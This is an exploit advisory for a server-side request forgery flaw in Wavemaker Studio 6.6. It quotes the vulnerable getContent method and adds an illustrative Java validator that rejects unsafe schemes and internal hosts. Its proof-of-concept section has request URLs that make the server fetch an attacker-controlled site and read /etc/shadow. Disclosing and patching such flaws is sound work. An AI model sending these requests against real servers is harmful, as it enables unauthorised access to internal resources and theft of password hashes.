# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF)
# Exploit Author: Gionathan "John" Reale
# Google Dork: N/A
# Date: 2018-08-01
# Vendor Homepage: http://www.wavemaker.com/
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
# Affected Version: 6.6
# Tested on: Parrot OS
# CVE : 2019-8982

# Description
# Wavemaker Studio 6.6 contains an exploitable unvalidated parameter allowing an
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
# as a form of HTTP proxy, among other things.

# Proof Of Concept
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow

# Vulnerable Code
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
# Line 419-430

    @ExposeToClient
    public String getContent(String inUrl) throws IOException {
        try {
            // inUrl is taken verbatim from the client and fetched server-side with no
            // scheme or host restriction; the fetched body is then returned to the caller
            // with a <base href> pointing at the attacker-controlled URL.
            String str = getRemoteContent(inUrl);
            str = str.replace("<head>", "<head><base href='" + inUrl + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
            return str;
        } catch (Exception e) {
            return "";
        }
    }
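The root cause above is that inUrl reaches getRemoteContent without any validation. The following is an added example of the kind of check a patch would put in front of the fetch; it is not WaveMaker's code, and the class name, the rejectReason method and the ALLOWED_HOSTS allowlist entry are assumptions made for illustration.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.util.Locale;
import java.util.Set;

// Hypothetical validator to be called before getRemoteContent(inUrl).
public class SafeContentUrlCheck {
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");
    // Assumed allowlist of hosts this feature is permitted to fetch from.
    private static final Set<String> ALLOWED_HOSTS = Set.of("cdn.example.com");

    /** Returns null if inUrl may be fetched, otherwise the reason it was rejected. */
    public static String rejectReason(String inUrl) {
        URI uri;
        try {
            uri = new URI(inUrl);
        } catch (URISyntaxException e) {
            return "malformed URL";
        }
        String scheme = uri.getScheme();
        if (scheme == null || !ALLOWED_SCHEMES.contains(scheme.toLowerCase(Locale.ROOT))) {
            return "scheme not allowed";            // rejects file://, jar://, gopher:// ...
        }
        String host = uri.getHost();
        if (host == null) return "no host";
        if (uri.getUserInfo() != null) return "userinfo not allowed";
        if (!ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) return "host not on allowlist";
        // Allowlisted hosts are still resolved, so a rebinding record pointing at
        // loopback or RFC 1918 space is caught; the fetch itself should pin this
        // address rather than resolve the name a second time.
        try {
            for (InetAddress addr : InetAddress.getAllByName(host)) {
                if (addr.isLoopbackAddress() || addr.isSiteLocalAddress()
                        || addr.isLinkLocalAddress() || addr.isAnyLocalAddress()) {
                    return "host resolves to an internal address";
                }
            }
        } catch (UnknownHostException e) {
            return "host does not resolve";
        }
        return null;
    }

    public static void main(String[] args) {
        // Constructed inputs mirroring the PoC shapes above; all are rejected before any DNS lookup.
        for (String u : new String[] {"file:///etc/shadow", "http://attackersite.com/", "http://127.0.0.1:8080/"}) {
            System.out.println(u + " -> " + rejectReason(u));
        }
    }
}
```

Scheme and allowlist checks alone do not address the second half of the issue, the injected `<base href>`; the fetched body should also be served with a restrictive Content-Type and without the rewriting shown in the vulnerable method.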